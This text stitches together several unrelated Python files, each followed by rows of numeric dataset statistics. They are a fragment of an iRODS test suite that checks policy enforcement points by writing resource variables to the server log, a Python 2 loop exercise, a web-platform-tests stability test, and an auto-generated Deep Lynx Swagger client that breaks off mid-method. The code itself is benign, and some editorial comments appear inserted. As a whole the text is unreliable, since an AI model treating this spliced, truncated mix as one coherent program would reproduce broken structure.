'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# ireg test file to trigger PEP
target_obj = os.path.join(sesh.home_collection, os.path.basename(testfile))
sesh.assert_icommand('ireg {testfile} {target_obj}'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
sesh.run_icommand('irm -f {target_obj}'.format(**locals()))
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acPostProcForCopy__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
testfile = self.testfile
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# iput test file
sesh.assert_icommand('iput -f {testfile}'.format(**locals()))
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# copy test file to trigger PEP
sesh.assert_icommand('icp {testfile} {testfile}_copy'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
sesh.run_icommand('irm -f {testfile}'.format(**locals()))
sesh.run_icommand('irm -f {testfile}_copy'.format(**locals()))
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acSetVaultPathPolicy__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
testfile = self.testfile
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# iput test file to trigger PEP
sesh.assert_icommand('iput -f {testfile}'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
sesh.run_icommand('irm -f {testfile}'.format(**locals()))
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acPreprocForDataObjOpen__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
testfile = self.testfile
target_obj = os.path.join(sesh.session_collection, testfile)
# prepare rule file
rule_file = "test_rule_file.r"
rule_string = '''
test_acPostProcForCreate__3024 {{
msiDataObjOpen("{target_obj}",*FD);
msiDataObjClose(*FD,*Status);
}}
INPUT null
OUTPUT ruleExecOut
'''.format(**locals())
with open(rule_file, 'w') as f:
f.write(rule_string)
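# Editorial note: the client-side rule file above only opens and then closes the target data
# object (msiDataObjOpen followed by msiDataObjClose), which is enough to drive the open-related
# PEP under test on the server. The rule label 'test_acPostProcForCreate__3024' inside the .r
# file appears to be copied from an earlier test and is not the PEP being exercised; irule -F
# executes the rule file under whatever name it carries.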
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# iput test file
sesh.assert_icommand('iput -f {testfile}'.format(**locals()))
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# invoke irule to trigger PEP
sesh.assert_icommand('irule -F {rule_file}'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
sesh.run_icommand('irm -f {target_obj}'.format(**locals()))
os.unlink(rule_file)
os.unlink(test_re)
@unittest.skipIf(configuration.TOPOLOGY_FROM_RESOURCE_SERVER, 'Skip for topology testing from resource server: reads rods server log')
def test_acPostProcForOpen__3024(self):
test_re = os.path.join(lib.get_core_re_dir(), 'test.re')
server_config_filename = lib.get_irods_config_dir() + '/server_config.json'
# get PEP name from function name
pep_name = inspect.stack()[0][3].split('_')[1]
# user session
sesh = self.user0
testfile = self.testfile
target_obj = os.path.join(sesh.session_collection, testfile)
# prepare rule file
rule_file = "test_rule_file.r"
rule_string = '''
test_acPostProcForCreate__3024 {{
msiDataObjOpen("{target_obj}",*FD);
msiDataObjClose(*FD,*Status);
}}
INPUT null
OUTPUT ruleExecOut
'''.format(**locals())
with open(rule_file, 'w') as f:
f.write(rule_string)
# query for resource properties
columns = ('RESC_ZONE_NAME, '
'RESC_FREE_SPACE, '
'RESC_STATUS, '
'RESC_ID, '
'RESC_NAME, '
'RESC_TYPE_NAME, '
'RESC_LOC, '
'RESC_CLASS_NAME, '
'RESC_VAULT_PATH, '
'RESC_INFO, '
'RESC_COMMENT, '
'RESC_CREATE_TIME, '
'RESC_MODIFY_TIME')
resource = sesh.default_resource
query = '''iquest "SELECT {columns} WHERE RESC_NAME ='{resource}'"'''.format(**locals())
result = sesh.run_icommand(query)[1]
# last line is iquest default formatting separator
resource_property_list = result.splitlines()[:-1]
with lib.file_backed_up(server_config_filename):
# prepare rule
# rule will write PEP name as well as
# resource related rule session vars to server log
rule_body = 'writeLine("serverLog", "{pep_name}");'.format(**locals())
rule_body += ('writeLine("serverLog", $KVPairs.zoneName);'
'writeLine("serverLog", $KVPairs.freeSpace);'
'writeLine("serverLog", $KVPairs.quotaLimit);'
'writeLine("serverLog", $KVPairs.rescStatus);'
'writeLine("serverLog", $KVPairs.rescId);'
'writeLine("serverLog", $KVPairs.rescName);'
'writeLine("serverLog", $KVPairs.rescType);'
'writeLine("serverLog", $KVPairs.rescLoc);'
'writeLine("serverLog", $KVPairs.rescClass);'
'writeLine("serverLog", $KVPairs.rescVaultPath);'
'writeLine("serverLog", $KVPairs.rescInfo);'
'writeLine("serverLog", $KVPairs.rescComments);'
'writeLine("serverLog", $KVPairs.rescCreate);'
'writeLine("serverLog", $KVPairs.rescModify);')
test_rule = '{pep_name} {{ {rule_body} }}'.format(**locals())
# write new rule file
with open(test_re, 'w') as f:
f.write(test_rule)
# update server config with additional rule file
server_config_update = {
"re_rulebase_set": [{"filename": "test"}, {"filename": "core"}]
}
lib.update_json_file_from_dict(server_config_filename, server_config_update)
# iput test file
sesh.assert_icommand('iput -f {testfile}'.format(**locals()))
# checkpoint log to know where to look for the string
initial_log_size = lib.get_log_size('server')
# invoke irule to trigger PEP
sesh.assert_icommand('irule -F {rule_file}'.format(**locals()))
# confirm that PEP was hit by looking for pep name in server log
assert lib.count_occurrences_of_string_in_log('server', pep_name, start_index=initial_log_size)
# check that resource session vars were written to the server log
for line in resource_property_list:
column = line.rsplit('=', 1)[0].strip()
property = line.rsplit('=', 1)[1].strip()
if property:
if column != 'RESC_MODIFY_TIME':
assert lib.count_occurrences_of_string_in_log('server', property, start_index=initial_log_size)
# cleanup
sesh.run_icommand('irm -f {target_obj}'.format(**locals()))
os.unlink(rule_file)
os.unlink(test_re)
| 45.066212 | 138 | 0.568157 | 4,864 | 46,283 | 5.173314 | 0.066406 | 0.100147 | 0.125184 | 0.01987 | 0.897747 | 0.883957 | 0.873425 | 0.873425 | 0.867504 | 0.866113 | 0 | 0.008157 | 0.319253 | 46,283 | 1,026 | 139 | 45.110136 | 0.790491 | 0.124538 | 0 | 0.82311 | 0 | 0 | 0.351794 | 0.141798 | 0 | 0 | 0 | 0 | 0.0699 | 1 | 0.022825 | false | 0 | 0.017118 | 0 | 0.041369 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
729882cc7fa8fff88babb42e9b911eb74a994fff | 1,813 | py | Python | lpthw/ex33.py | jaredmanning/learning | 1d1767ea78a8f9f72275b18147d47bfc44a1696e | ["MIT"] | null | null | null | lpthw/ex33.py | jaredmanning/learning | 1d1767ea78a8f9f72275b18147d47bfc44a1696e | ["MIT"] | null | null | null | lpthw/ex33.py | jaredmanning/learning | 1d1767ea78a8f9f72275b18147d47bfc44a1696e | ["MIT"] | null | null | null |
#i = 0
#numbers = []
#
#while i < 6:
# print "At the top i is %d" % i
# numbers.append(i)
#
# i += 1
# print "Numbers now: ", numbers
# print "At the bottom i is %d" % i
#
#
#print "The numbers: "
#
#for num in numbers:
# print num
#Study Drill Part 1
#print "What's the limit of the list?"
#a = int(raw_input("> "))
#
#def list_numbers(a):
# """This function might add numbers to a list?"""
# i = 0
# numbers = []
#
# while i < a:
# print "At the top i is %d" % i
# numbers.append(i)
#
# i += 1
# print "Numbers now: ", numbers
# print "At the bottom i is %d" % i
#
# print "The numbers: "
#
# for num in numbers:
# print num
#
# return
#
#list_numbers(a)
#Study Drill Part 2
#print "What's the limit of the list?"
#a = int(raw_input("> "))
#
#print "What is the desired increment?"
#n = int(raw_input("> "))
#
#def list_numbers():
# """This function might add numbers to a list?"""
# i = 0
# numbers = []
#
# while i < a:
# print "At the top i is %d" % i
# numbers.append(i)
#
# i += n
# print "Numbers now: ", numbers
# print "At the bottom i is %d" % i
#
# print "The numbers: "
#
# for num in numbers:
# print num
#
# return
#
#list_numbers()
#Study Drill Part 3
print "What's the limit of the list?"
a = int(raw_input("> "))
print "What is the desired increment?"
n = int(raw_input("> "))
def list_numbers():
"""This function adds numbers to a list"""
i = 0
numbers = []
for i in range(0, a, n):
print "At the top i is %d" % i
numbers.append(i)
print "Numbers now: ", numbers
print "At the bottom i is %d" % i
print "The numbers: "
for num in numbers:
print num
return
list_numbers()
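# Editorial sketch (not part of the original exercise): the same Study Drill logic in Python 3
# syntax, where print is a function and raw_input() has become input(). Kept as a comment so the
# surrounding Python 2 file stays runnable as-is; the names below are illustrative only.
#
# def list_numbers_py3(limit, step):
#     """Collect and print numbers from 0 up to limit, stepping by the given increment."""
#     numbers = []
#     for i in range(0, limit, step):
#         print("At the top i is %d" % i)
#         numbers.append(i)
#         print("Numbers now:", numbers)
#         print("At the bottom i is %d" % i)
#     print("The numbers:")
#     for num in numbers:
#         print(num)
#
# list_numbers_py3(int(input("> ")), int(input("> ")))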
| 18.13 | 53 | 0.539989 | 273 | 1,813 | 3.545788 | 0.161172 | 0.057851 | 0.082645 | 0.041322 | 0.930785 | 0.915289 | 0.900826 | 0.877066 | 0.877066 | 0.877066 | 0 | 0.008793 | 0.309983 | 1,813 | 99 | 54 | 18.313131 | 0.764988 | 0.646442 | 0 | 0 | 0 | 0 | 0.241966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.411765 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
72cff21016a8e51036bb99e46b27cb70bbf044b9 | 436 | py | Python | tools/wptrunner/wptrunner/tests/test_stability.py | mtrzos/wpt | 6e559a60ecfa38ad6cc434911dd0995a63900db6 | ["BSD-3-Clause"] | null | null | null | tools/wptrunner/wptrunner/tests/test_stability.py | mtrzos/wpt | 6e559a60ecfa38ad6cc434911dd0995a63900db6 | ["BSD-3-Clause"] | 1 | 2021-12-13T19:49:45.000Z | 2021-12-13T19:49:45.000Z | tools/wptrunner/wptrunner/tests/test_stability.py | mtrzos/wpt | 6e559a60ecfa38ad6cc434911dd0995a63900db6 | ["BSD-3-Clause"] | null | null | null |
import sys
from os.path import dirname, join
sys.path.insert(0, join(dirname(__file__), "..", ".."))
from wptrunner import stability
def test_is_inconsistent():
assert stability.is_inconsistent({"PASS": 10}, 10) is False
assert stability.is_inconsistent({"PASS": 9}, 10) is True
assert stability.is_inconsistent({"PASS": 9, "FAIL": 1}, 10) is True
assert stability.is_inconsistent({"PASS": 8, "FAIL": 1}, 10) is True
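# Editorial note: the asserts above pin down the intended semantics of stability.is_inconsistent.
# One reading consistent with all four cases is that a result set is inconsistent whenever any
# status count differs from the expected number of runs. A minimal sketch of that reading
# (an assumption for illustration, not the actual wptrunner implementation):
#
# def _is_inconsistent_sketch(status_counts, expected_runs):
#     return any(count != expected_runs for count in status_counts.values())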
| 33.538462 | 72 | 0.697248 | 63 | 436 | 4.666667 | 0.396825 | 0.238095 | 0.231293 | 0.394558 | 0.571429 | 0.397959 | 0.278912 | 0.278912 | 0 | 0 | 0 | 0.043011 | 0.146789 | 436 | 12 | 73 | 36.333333 | 0.747312 | 0 | 0 | 0 | 0 | 0 | 0.06422 | 0 | 0 | 0 | 0 | 0 | 0.444444 | 1 | 0.111111 | true | 0.444444 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
72ee7eff30903c2e66eb4a676b8d1d7d779424fb | 58,004 | py | Python | swagger_client/api/data_type_mappings_api.py | idaholab/Deep-Lynx-Python-Package | 99927cc877eba8e2ee396feec807da1c48c64893 | ["MIT"] | 3 | 2021-06-16T20:34:41.000Z | 2021-06-16T23:54:36.000Z | swagger_client/api/data_type_mappings_api.py | idaholab/Deep-Lynx-Python-Package | 99927cc877eba8e2ee396feec807da1c48c64893 | ["MIT"] | null | null | null | swagger_client/api/data_type_mappings_api.py | idaholab/Deep-Lynx-Python-Package | 99927cc877eba8e2ee396feec807da1c48c64893 | ["MIT"] | null | null | null |
# coding: utf-8
"""
Deep Lynx
The construction of megaprojects has consistently demonstrated challenges for project managers in regard to meeting cost, schedule, and performance requirements. Megaproject construction challenges are commonplace within megaprojects with many active projects in the United States failing to meet cost and schedule efforts by significant margins. Currently, engineering teams operate in siloed tools and disparate teams where connections across design, procurement, and construction systems are translated manually or over brittle point-to-point integrations. The manual nature of data exchange increases the risk of silent errors in the reactor design, with each silent error cascading across the design. These cascading errors lead to uncontrollable risk during construction, resulting in significant delays and cost overruns. Deep Lynx allows for an integrated platform during design and operations of mega projects. The Deep Lynx Core API delivers a few main features. 1. Provides a set of methods and endpoints for manipulating data in an object oriented database. This allows us to store complex datatypes as records and then to compile them into actual, modifiable objects at run-time. Users can store taxonomies or ontologies in a readable format. 2. Provides methods for storing and retrieving data in a graph database. This data is structured and validated against the aforementioned object oriented database before storage. # noqa: E501
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class DataTypeMappingsApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_transformation(self, body, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""CreateTransformation # noqa: E501
Create a transformation for the type mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_transformation(body, container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CreateTypeMappingTransformationsRequest body: (required)
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: CreateTransformationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_transformation_with_http_info(body, container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
else:
(data) = self.create_transformation_with_http_info(body, container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
return data
def create_transformation_with_http_info(self, body, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""CreateTransformation # noqa: E501
Create a transformation for the type mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_transformation_with_http_info(body, container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param CreateTypeMappingTransformationsRequest body: (required)
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: CreateTransformationResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'container_id', 'data_source_id', 'mapping_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_transformation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_transformation`") # noqa: E501
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `create_transformation`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `create_transformation`") # noqa: E501
# verify the required parameter 'mapping_id' is set
if ('mapping_id' not in params or
params['mapping_id'] is None):
raise ValueError("Missing the required parameter `mapping_id` when calling `create_transformation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
if 'mapping_id' in params:
path_params['mapping_id'] = params['mapping_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/{mapping_id}/transformations', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateTransformationResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
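# Editorial usage sketch (illustrative only; not emitted by swagger-codegen). Assumes a reachable
# Deep Lynx instance and hypothetical identifier values:
#
#   api = DataTypeMappingsApi()  # uses a default ApiClient()
#   body = CreateTypeMappingTransformationsRequest()  # populate per the model definition
#   # synchronous call, returns a CreateTransformationResponse
#   response = api.create_transformation(body, 'container-1', 'datasource-1', 'mapping-1')
#   # asynchronous call, returns a thread; block on .get() for the result
#   thread = api.create_transformation(body, 'container-1', 'datasource-1', 'mapping-1', async_req=True)
#   response = thread.get()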
def delete_data_type_mapping(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""DeleteDataTypeMapping # noqa: E501
Permanently remove data type mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_data_type_mapping(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: Generic200Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
else:
(data) = self.delete_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, **kwargs) # noqa: E501
return data
def delete_data_type_mapping_with_http_info(self, container_id, data_source_id, mapping_id, **kwargs): # noqa: E501
"""DeleteDataTypeMapping # noqa: E501
Permanently remove data type mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_data_type_mapping_with_http_info(container_id, data_source_id, mapping_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:return: Generic200Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['container_id', 'data_source_id', 'mapping_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_data_type_mapping" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'container_id' is set
if ('container_id' not in params or
params['container_id'] is None):
raise ValueError("Missing the required parameter `container_id` when calling `delete_data_type_mapping`") # noqa: E501
# verify the required parameter 'data_source_id' is set
if ('data_source_id' not in params or
params['data_source_id'] is None):
raise ValueError("Missing the required parameter `data_source_id` when calling `delete_data_type_mapping`") # noqa: E501
# verify the required parameter 'mapping_id' is set
if ('mapping_id' not in params or
params['mapping_id'] is None):
raise ValueError("Missing the required parameter `mapping_id` when calling `delete_data_type_mapping`") # noqa: E501
collection_formats = {}
path_params = {}
if 'container_id' in params:
path_params['container_id'] = params['container_id'] # noqa: E501
if 'data_source_id' in params:
path_params['data_source_id'] = params['data_source_id'] # noqa: E501
if 'mapping_id' in params:
path_params['mapping_id'] = params['mapping_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['httpBearer'] # noqa: E501
return self.api_client.call_api(
'/containers/{container_id}/import/datasources/{data_source_id}/mappings/{mapping_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Generic200Response', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_transformation(self, container_id, data_source_id, mapping_id, transformation_id, **kwargs): # noqa: E501
"""DeleteTransformation # noqa: E501
Delete a transformation. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_transformation(container_id, data_source_id, mapping_id, transformation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str container_id: (required)
:param str data_source_id: (required)
:param str mapping_id: (required)
:param str transformation_id: (required)
:return: Generic200Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_transformation_with_http_info(container_id, data_source_id, mapping_id, transformation_id, **kwargs) # noqa: E501
else:
